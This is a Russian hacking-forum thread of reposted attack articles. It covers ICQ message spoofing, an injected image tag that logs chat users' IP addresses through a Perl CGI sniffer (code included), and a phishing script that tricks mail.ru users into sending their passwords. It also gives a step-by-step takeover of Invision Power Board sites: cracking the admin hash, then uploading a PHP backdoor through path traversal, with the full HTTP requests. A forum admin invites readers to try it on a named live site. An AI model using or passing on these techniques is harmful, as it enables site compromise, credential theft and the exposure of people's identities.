Нежно любимая миллионами пользователей ICQ (http://www.icq.com) тоже оказалась не без греха. На странице Fyodor's Exploit world (http://www.dhp.com/~fyodor/sploits.html) помимо прочего приведена информация о слабостях ICQ-шного протокола (http://www.dhp.com/~fyodor/sploits/icq.spoof.overflow.seq.html), которые уже позволили создать многочисленные программы, делающие жизнь пользователя ICQ не слишком пресной. Так, например, на странице ICQ Snoofer Team (http://const.ricor.ru/~icq/) предлагается опробовать программу, позволяющую слать сообщения по ICQ с чужого UIN. Snoofer существует в двух вариантах - в виде скрипта, доступного со страницы, и в виде программы, которую обещают рассылать по почте. Для его использования достаточно знать ip-адрес адресата, номер порта, на котором висит ICQ, и UIN отправителя. Инструкция прилагается. Впрочем, все эти веселые программы пригодны в основном для деструктивной деятельности, особого смысла, в которой я не вижу (кстати, запущенное на нашем сервере голосование по поводу "нюков" показало, что большинство посетителей со мной солидарно).
Посмотрим, какие действия можно предпринять для определения и скрытия ip-адреса.

Абсолютных рецептов, конечно, не существует, можно говорить лишь о наиболее распространенных случаях. Вообще говоря, ваш IP-адрес может засветиться в огромном количестве мест. Другое дело - как его потом оттуда вытащить. Скажем, ваш любимый броузер при заходе на любую страницу сообщает о себе достаточно много информации.

В качестве простой демонстрации приведу скрипт на Perl'е, выводящий основную информацию о посетителе страницы:

Листинг 1. showuser.pl

#!/usr/bin/perl
print ("Content-type: text/html\n\n");
@ee=(
"CHARSET",
"HTTP_USER_AGENT",
"HTTP_REFERER",
"REMOTE_ADDR",
"REMOTE_HOST"
);
foreach $e(@ee)
{
print "$e: $ENV{$e}
\n";
}


Вообще-то это самый безобидный случай обнародования ip-адреса (разве что если допустить злой умысел веб-мастера, установившего скрипт, атакующий посетителя, но вероятность целенаправленной атаки ничтожно мала).

IP-адрес отправителя можно вытащить из заголовка полученной электронной почты (Скорее всего, он будет лежать в последнем поле Received:, в отличие от поля From: его подделать чуть сложнее). Если у вас динамически выделяемый адрес, то подобная ситуация не слишком опасна. Хуже, если адрес постоянный, что, правда, встречается, но реже.

Самыми опасными с точки зрения обнародования ip-адреса оказываются всевозможные системы для интерактивного общения - IRC (командой /whois), InternetPhone, ICQ и т.д. Справедливости ради надо заметить, что некоторые из них пытаются прикрыть адрес пользователя (скажем, в MS Comic Chat показывается только часть адреса, в ICQ'98 появилась возможность скрытия своего адреса, не слишком правда хорошо работающая при общении со старыми версиями), но в большинстве систем адрес лежит совершенно открыто. Что же касается html-чатов, здесь все зависит от желания разработчика, принципиальная возможность показа ip-адреса существует, как это было продемонстрировано чуть выше.

Идея следующая: если в чате разрешен ввод тегов html, никто не помешает вставить в свое сообщение что-то типа В итоге все присутствующие в чате (даже не зарегистрировавшиеся) будут, сами того не ведая, вызывать скрипт sniffer.cgi. Ну а остальное уже дело техники, реализация подобного скрипта на Perl'е, ведущего лог всех обращений, займет несколько строчек. Демонстрационный вариант этого скрипта доступен на www.hackzone.ru/cgi-bin/sniffer.cgi

Способ применения очень прост - вы вставляете в свое сообщение текст наподобие следующего:

<img src=http://www.hackzone.ru/cgi-bin/sniff.cgi?id>, где id - идентификатор канала (помогает не запутаться при использовании скрипта на разных чатах разными людьми).

Если этот чат поддерживает вставку html-тегов, то скорее всего вы увидите анимированный логотип HackZone. Все, что теперь осталось - просмотреть лог (http://www.hackzone.ru/files/snifflog.txt), в который пишется дата обращения к скрипту, ip-адрес и идентификатор id.

Поскольку речь идет о демонстрации, в логе хранятся только 30 последних записей.

Листинг 2. sniffer.pl

#!/usr/bin/perl
$log = "/local/path/on/your/server/snifflog.txt";
$now_string = localtime;
@thetime = split(/ +/,$now_string);
@theclock = split(/:/,$thetime[3]);
$ampm = 'am';
if ($theclock[0] > 11)
{ $ampm = 'pm'; }
if ($theclock[0] == 0)
{ $theclock[0] = 12; }
if ($theclock[0] > 12)
{ $theclock[0] -= 12; }
else
{ $theclock[0] += 0; }
$lnum=$ENV{'QUERY_STRING'};
open (DB, "$log") || die "Can't Open $log: $!\n";
flock(DB, 2);
@line=;
flock(DB, 8);
close(DB);
$line0="[$thetime[0] $theclock[0]\:$theclock[1]$ampm] (".$lnum.") ".
$ENV{REMOTE_ADDR}." ".$ENV{REMOTE_HOST};
$maxline=@line;
$maxline=30 if ($maxline>30);
open (DB, ">$log") || die "Can't Open $log: $!\n";
flock(DB, 2);
print DB ("$line0\n");
for ($i=0; $i
Теперь немного о том как же защититься от всего этого безобразия. Самый простой способ прикрыться при прогулках по Web - воспользоваться proxy либо службой
наподобие Anonymizer, Inc.(http://sol.infonex.com/). Принцип их работы аналогичен - вы напрямую
общаетесь только с proxy-сервером, а черную работу по заходу на сайты он делает за вас.

Хуже всего дело обстоит с чатами. Проблема в том, что если найти какой-нибудь левый прокси для www достаточно легко, подобный сервис для irc, icq и иже с ними встречается, мягко говоря, очень редко и для простого dialup-пользователя практически недоступен. Именно поэтому большая часть средств для атаки по ip заточена под всевозможные irc-клиенты. Так что бороться тут можно лишь двумя способами. Самый надежный - не использовать их вообще. Более реалистичный - бороться не с причиной, а со следствиями - разыскать свежайшие заплаты и надеяться, что против вашей брони еще не изобрели подходящей пушки.

Заинтересовавшимся вопросом приватности в Интернет могу порекомендовать очень хороший сайт "Privacy Issues: Частная жизнь в Интернете" (http://www.tamos.com/privacy/ru/), целиком посвященный этой теме. Помимо вопросов анонимности в WWW и IRC (расписанных весьма подробно), здесь рассматриваются способы установления личности по адресу электронной почты, даются краткие рекомендации по использованию криптографических средств, здесь же программа для подсматривания ввода с клавиатуры, несколько приятных ссылок и т.д.

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
постоянный участник




Пост N: 4
Зарегистрирован: 01.01.07
Рейтинг: 0
ссылка на сообщение  Отправлено: 01.01.07 20:58. Заголовок: Re:


Взлом почты или Идеальной защиты не существует

Самый распространённый способ. Основывается на следующем. Все мы с вами люди, так? У нас у всех одинаковые слабости, недостатки, все мы делаем чисто человеческие ошибки. Вот на этом-то и основана наука славная социальная инженерия. Так, короче. Хакер может написать жертве письмо примерно такого содержания:
"Почтовая служба @mail.ru проводит чистку аккаунтов. Если Вы не хотите, чтобы ваш аккаунт был удалён, ответьте на это письмо указав в поле "Тема" Ваш логин и пароль в следующем формате: username; password"
Спросишь, почему именно в поле тема? Отвечаю. Конечно, это совсем не обязательно. Просто жертва будет думать, что письмо для автоматической обработки получит робот, а к роботу больше доверия. Вместо чистки аккаунтов можно придумать что-нибудь другое: мол, с вашего ящика идёт рассылка вирусов/спама, вышлите пароль, в противном случае ваш аккаунт будет удалён... Короче, можно дохрена всего придумать.. Гм, чуть не забыл! Письмо может быть написано с правдоподобного мыла, типа admin@mail.ru, support@mail.ru, webmaster@mail.ru... Также, хакер можнет воспользоваться каким-нибудь анонимайзером или послать письмо telnet-клиентом, указав в заголовке "адрес ответа"(reply-to) своё мыло. Таким образом, в поле "от кого" жертва видит, например admin@mail.ru, но при ответе на письмо ответ уйдёт на указанный e-mail.

Злоумышленник может зарегистрировать где-нить, на народе например, страничку с заголовком типа "Ломаем чужое мыло" и отправить жертве ссылку якобы на хакерскую страничку... На самой страничке может находится текст типа:
"На mail.ru несколько МИЛЛИОНОВ пользователей. Есть процент, который имеет слабую память и тупые мозги, чтоб запомнить свой пароль и частенько эти перцы сталкиваются с проблемой забывания пароля Итак, даже небольшой процент от более чем милионной толпы владельцев мыльниц - это тоже своеобразная толпа, которая требует свои пароли. Существуют всякие системы аля "Забыл пароль" в котором вас спрашивают ответ на секретный вопрос, данные, которые Вы вводили при регистрации и т.п. Но самое интересное, что этим занимается не человек, а машина, т.е. обычная программулина !!!! А если есть программа - есть в ней дыра. Теперь приступим к описанию конкретных действий.
Тут все просто. По адресу pass_repair@mail.ru сидит mail-робот, который анализирует запросы на восстановление пароля и в зависимости от этого либо уточняет ваши данные, либо сразу шлет пароль. На сайте есть форма для заполнения с всевозможными параметрами, которая потом шлется роботу со специальным Subject'ом. Фишка в том, что если в сабжект впихнуть не один, а два запроса, то проверятся будет последний ящик, а информация будет выслана для второго! Так шевелим мозгами... Правильно! Высылаем два запроса: в одном сообщаем инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем ;) )

Итак, мы хотим обломать vasya_pupkin@mail.ru
Наш ящик hacker@mail.ru пароль qwerty
Пишем письмо роботу на pass_repair@mail.ru
Subject: login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=

Т.е. первый раз вставляем в тему письма запрос о ящике-жертве - vasya_pupkin@mail.ru : login=vasya_pupkin&pass=&answer=
А потом, через точку с запятой второй запрос, с вашими данными, которые робот проверит и убедится, что они правильные!
login=hacker&pass=qwerty&answer=
Итого : тема сообщения выглядит вот так :
login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=
Все, ждите пасс на ваше мыло!!!"


Заметил подвох? молодец! для "невъехавших" объясню... хакеру достаточно создать свой ящик на почтовом сервере с именем типа pass_repair@mail.ru. Теперь пароли целой стаей летят к нему на мыло! Понял? Ну а дальше ему главное не зевать.. просто быстро поменять секретный пароль/ответ, адрес пересылки(причем ~99%, что там пасс такой же!)

c@sillias

Спасибо: 0 
ПрофильЦитата Ответить
администратор




Пост N: 161
Зарегистрирован: 02.05.06
Откуда: РОССИЯ, Калининград
Рейтинг: 0
ссылка на сообщение  Отправлено: 01.01.07 21:17. Заголовок: Re:


c@sillias пишет:

 цитата:
Заметил подвох? молодец! для "невъехавших" объясню... хакеру достаточно создать свой ящик на почтовом сервере с именем типа pass_repair@mail.ru. Теперь пароли целой стаей летят к нему на мыло! Понял? Ну а дальше ему главное не зевать.. просто быстро поменять секретный пароль/ответ, адрес пересылки(причем ~99%, что там пасс такой же!)

c@sillias



pass_repair@mail.ru - так он же уже будет занят, если такой адрес уже существует у робота...

Вот так и живём... Спасибо: 0 
ПрофильЦитата Ответить
постоянный участник




Пост N: 6
Зарегистрирован: 01.01.07
Рейтинг: 0
ссылка на сообщение  Отправлено: 04.01.07 17:29. Заголовок: Re:


Djeraldo пишет:

 цитата:
pass_repair@mail.ru - так он же уже будет занят, если такой адрес уже существует у робота...


У робота - support@mail.ru

Спасибо: 0 
ПрофильЦитата Ответить
администратор




Пост N: 172
Зарегистрирован: 02.05.06
Откуда: РОССИЯ, Калининград
Рейтинг: 0
ссылка на сообщение  Отправлено: 05.01.07 01:36. Заголовок: Re:



 цитата:
pass_repair@mail.ru

наврядли...

Тебе сюда учиться уму разуму.

Вот так и живём... Спасибо: 0 
ПрофильЦитата Ответить
постоянный участник




Пост N: 12
Зарегистрирован: 01.01.07
Рейтинг: 0
ссылка на сообщение  Отправлено: 06.01.07 12:31. Заголовок: Re:


Мля, там не только этот способ у меня описан...

Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Пост N: 788
Зарегистрирован: 02.05.06
Откуда: РФ, Гусев
Рейтинг: 0
ссылка на сообщение  Отправлено: 06.01.07 20:27. Заголовок: Re:


c@sillias Ты напиши статью в TOF - было бы интересно, и полезно для журнала. Глядишь и TOF станет "хакером".


Вот эта статья очень полезна и серьёзна:
Кто хочет, пусть экспирементирует, например, на http://bit16.info (Русская версия Invision Power Board v2.1.6 © 2007 IPS, Inc.)


 цитата:
Захват сайтов, использующих форум Invision Power Board

Автор: Algol


В статье описывается захват сайта, использующего форум Invision Power Board.

Внимание: статья написана в ознакомительных целях. Не пытайтесь использовать данную статью в целях взлома сайтов, это уголовно наказуемо.

Целью наших действий будет загрузка на удаленный сайт PHP-скрипта, дающего доступ к файловой системе сервера (т.н. backdoor).

Метод взлома
Захват сайта осуществляется в два этапа. Первый - получение логина и пароля администратора форума. Второй - загрузка на сайт специального php-скрипта, позволяющего оперировать файлами сервера.
В статьях на нашем сайте уже писалось про XSS уязвимости форумов IPB (ссылка), и демонстрировался механизм получения прав модератора форума. Уязвимости позволяют нам, также, получить хеш-код пароля администратора. Если хеш в наших руках, можем двигаться дальше.

Для администраторов, форум IPB использует двойную защиту: сначала нужно зайти на сайт под логином/паролем администратора, а затем для входа в админку требуется снова ввести логин/пароль для получения администраторской сессии. Таким образом, одного только хеш-кода пароля мало для доступа к админке форума. Хеш код нужно расшифорвать. Для расшифровки хеша можно воспользоваться, например, програмкой MD5Inside.

После расшифровки хеша, мы получаем доступ к панели управления форумом. Наша цель- залить на сайт файл с расширением php. Это может оказаться непросто, поскольку админка IPB предусматривает изменения только HTML-шаблонов, но не PHP скриптов. Однако, такая возможность все таки существует.
Один из способов загрузки произвольных PHP скриптов на сайт, осуществляется через меню Manage emoticons. Внизу мы видим форму для отправки смайликов на сервер. Защиты на тип файлов для смайликов, в IPB не предусмотрено, поэтому без труда можно залить файл произвольного типа.

Если загрузка удалась, то к файлу будет доступ по адресу http://someSiteForum/html/emoticons/myFile.php, и взлом можно считать законченным. Однако, возможна такая ситуация, что запись в папку emoticons запрещена. В таком случае воспользуемся обходным маневром, и запишем файл в ту папку, которая открыта на запись. А такая папка всегда существует в IPB, и называется uploads. Эта папка используется для хранения аватаров пользователей и для хранения присоединенных к постингам файлов. Понятное дело, что эта папка всегда открыта для записи.
Для загрузки файла в папку uploads используем все ту же форму для загрузки смайликов. Несмотря на то, что эта форма предназначена дла загрузки файлов только в папку html/emoticons, это органичение можно обойти, подделав HTTP запрос.

Исходный запрос для загрузки файла выглядит следующим образом:

POST http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="c:/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--

Обратим внимание на фрагмент запроса filename="c:/myFile.php". Этот фрагмент автоматически посылается браузером, и содержит полное локальное имя отсылаемого файла. При приеме запроса, сервер отбрасывает локальную часть пути и сохраняет файл под именем myFile.php в папке html/emoticons. Но если в качестве имени файла передать например такой filename="../myFile.php", то сервер не отбрасывает путь, поскольку он не является локальным, и загружает файл в папку, по указанному пути, относительно папки html/emoticons. Таким образом, послав модифицированный запрос, мы сможем загрузить произвольный файл в произвольную папку сервера.
Для загрузки скрипта в папку uploads, использовался такой запрос:

POST http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--

Для отсылки модифицированного запроса, использовалась программа InetCrack.
После загрузки на сервер PHP-скрипта типа remview.php(удаленный файловый web-менеджер), который будет доступен по адресу http://someSiteForum/uploads/remview.php, мы получаем полный контроль над сайтом.



Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
постоянный участник




Пост N: 15
Зарегистрирован: 01.01.07
Рейтинг: 0
ссылка на сообщение  Отправлено: 07.01.07 13:26. Заголовок: Re:


TiberiyLTim пишет:

 цитата:
c@sillias Ты напиши статью в TOF - было бы интересно, и полезно для журнала. Глядишь и TOF станет "хакером".


В принципе, можно...

Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Пост N: 800
Зарегистрирован: 02.05.06
Откуда: РФ, Гусев
Рейтинг: 0
ссылка на сообщение  Отправлено: 07.01.07 15:00. Заголовок: Re:


c@sillias пишет:

 цитата:
В принципе, можно...

Ну, мы всегда рады такой науке как хакерство, и не важно в какой области - взлом или что ещё...

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
постоянный участник




Пост N: 18
Зарегистрирован: 01.01.07
Рейтинг: 0
ссылка на сообщение  Отправлено: 07.01.07 15:03. Заголовок: Re:


Давай только не в этот номер... :)

Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Пост N: 802
Зарегистрирован: 02.05.06
Откуда: РФ, Гусев
Рейтинг: 0
ссылка на сообщение  Отправлено: 07.01.07 15:20. Заголовок: Re:


c@sillias пишет:

 цитата:
Давай только не в этот номер... :)

как тебе угодно.

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Ответов - 25 , стр: 1 2 3 All [только новые]
Ответ:
1 2 3 4 5 6 7 8 9
большой шрифт малый шрифт надстрочный подстрочный заголовок большой заголовок видео с youtube.com картинка из интернета картинка с компьютера ссылка файл с компьютера русская клавиатура транслитератор  цитата  кавычки моноширинный шрифт моноширинный шрифт горизонтальная линия отступ точка LI бегущая строка оффтопик свернутый текст

показывать это сообщение только модераторам
не делать ссылки активными
Имя, пароль:      зарегистрироваться    
Тему читают:
- участник сейчас на форуме
- участник вне форума
Все даты в формате GMT  3 час. Хитов сегодня: 21
Права: смайлы да, картинки да, шрифты да, голосования нет
аватары да, автозамена ссылок вкл, премодерация откл, правка нет